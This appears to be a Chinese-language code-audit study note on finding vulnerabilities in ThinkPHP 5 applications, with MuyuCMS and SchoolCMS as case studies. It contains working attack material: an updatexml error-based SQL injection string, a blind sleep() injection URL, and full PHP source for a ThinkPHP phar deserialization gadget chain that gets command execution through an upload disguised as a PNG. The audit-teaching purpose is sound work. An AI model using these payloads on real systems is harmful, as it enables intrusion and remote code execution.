网站推广服务chuseo网页设计版权信息代码

入口文件

前端页面显示文件

就是这串代码让我们看到前端的笑脸图

不用入口文件我们要访问这个文件就要按照开发手册的url访问模式

那就是index.php/index/index/index

对应的就是模块，控制器，操作，函数名

如果想要创建新模块，和操作格式要和图中的一样，但在controdler文件创建是类，才会自动加载class和上面的namspace这些内容

不安全写法

而tp框架有自己写sql语句的语法

这里创建一个新的类

明明规则，第一个必须大写

查询语句要导入一个新的类，就db，导入了才能使用

按照tp框架的安全sql查询方法

tp有有一个debug调试模式，开启就可以看到执行的sql语句，报错等等

在访问网站就看到了调试图标

在安全写法的时候，在后门拼接任何参数都没更改

按照手册安全写法，写接受数据的语句

这样就可以传入id参数查询数据

官方的提交方式，那这里会不会有sql注入

没有，根本不会带入查询，这是tp的安全写法内置过滤

这就是框架，只要按照开发手册的写法，不是框架的问题就不会有漏洞，因为在执行过程中或者类里面就有过滤代码

如果不按照手册写

例如写成这样

)%20and%201=(updatexml(1,concat(0x3a,(select%20user())),1))%23

这就造成了sql注入

这里不按照官方写法，调试也检测不到sql语句，也容易产生安全问题

tp版本漏洞反序列化phar漏洞

还有一种是版本安全问题

或者自己二开的时候写了不安全代码

比如写成这样，exists是确定文件存不存在,这里创建一个文件，由于触发的目录是public目录，所以文件要创建在public目录下

文件存在，那这里因为有exists函数去操作文件了，就可以造成phar反序列化漏洞

O:27:"think\process\pipes\Windows":1:{s:34:"think\process\pipes\Windowsfiles";a:1:{i:0;O:17:"think\model\Pivot":3:{s:17:"think\Modeldata";a:1:{s:5:"smi1e";s:2:"id";}s:21:"think\ModelwithAttr";a:1:{s:5:"smi1e";s:6:"system";}s:9:"*append";a:1:{s:5:"smi1e";s:1:"1";}}}}

而生成这个pyload是基于

这两个目录生成，复制出来

这里调用的链也是tp的链

就要把生成phar的类变成tp调用链

把class那个类换成tp调用类

就是这个文件的类

之后还要从另一个文件复制点东西

复制过来之后，把第二值赋予一个变量a，。任何倒数三行变量也改成变量啊。还要把这些内容阔在namespace里面，

这里把执行的命令改成calc，就不需要变量system传递参数了，所以删掉

源码

<?php
namespace think\process\pipes {class Windows{private $files;public function __construct($files){$this->files = array($files);}}
}namespace think\model\concern {trait Conversion{protected $append = array("smi1e" => "1");}trait Attribute{private $data;private $withAttr = array("smi1e" => "system");public function get(){$this->data = array("smi1e" => "calc");}}
}
namespace think {abstract class Model{use model\concern\Attribute;use model\concern\Conversion;}
}namespace think\model{use think\Model;class Pivot extends Model{public function __construct(){$this->get();}}
}
namespace {$Conver = new \think\model\Pivot($parameter);$a= new \think\process\pipes\Windows($Conver);$phar = new Phar("x.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$phar->setMetadata($a); //将自定义的meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算$phar->stopBuffering();
}?>

wc，为什么生成phar.phar？

不管了，放搭配pubuli目录下

直接这个格式访问，命令执行

这就是tp的版本漏洞，反序列化phar类型，只要有这种去文件操作类的函数，上传上去的哪怕是图片也能命令执行

muyucms反序列化漏洞

源码搞到了，但必须是数据库5.6，小皮没有

tp版本。

入口点

application目录

思路

myyucms

tp5.0.24

1.找到tp版本存在的漏洞

2.找不安全的写法（sql注入，文件上传等等）

找不安全的写法（sql注入，文件上传等等）

就去对比官方手册看危险操作有没有严格按照官方手册去写

全局搜搜sql函数，因为是tp框架，看不到直接的selecr这些，所以搜where

这个地方直接写的等号，没有按照安全写法

变量uid是从s形的id的userid获取

再往下看，更危险的写法

这里就要记录，出发文件，函数名，要求条件

确定一下访问路径

admin/login/login.html

这就大概猜出来他的访问模式

admin模块，login控制，login操作

所以触发漏洞地方的访问方式

bbs/user/xiaodidel

触发到了

在满足条件ids=0 任何id就是注入点

注入成功

找到tp版本存在的漏洞

案例二schoolcms版本漏洞问题

3.23版本

参考文章

https://www.freebuf.com/articles/web/345544.html

大概看了一下处理流程，最后是在进行格式定义的不进入intval转义那条代码，进入str的就可以使用传入数组的方式绕过过滤

主要漏洞函数点find、

全局变量搜一下

拼接一些路徑

http://school.cn:90/admin.php?m=Admin&c=Index&a=Index

m=Admin&cArticle&a=SaveInfo

http://school.cn:90/admin.php?m=Admin&c=Article&a=SaveInfo&id=1

ok，但这个注入是不会回显报错语句，所以用到盲注，然后参考文档也是要用到数组的传递方式，不进入intval处理函数

这里看数据库监控执行的语句没有id=

最好在加一个

最后pyload

http://school.cn:90/admin.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=1%20and%20sleep(3)#

延时了，存在盲注

案例三muyucms  反序列化漏洞

版本

然后生成phar文件，去找文件的操作函数

file_exists(),fopen(),file_get_contents(),file()

就是这里

然后构造一下访问目录

然后就注册账户，上传phar报的png

直接就phar://  头像文件

反序列化命令执行！！

成了！

案例四，学员提供源码

jian

kang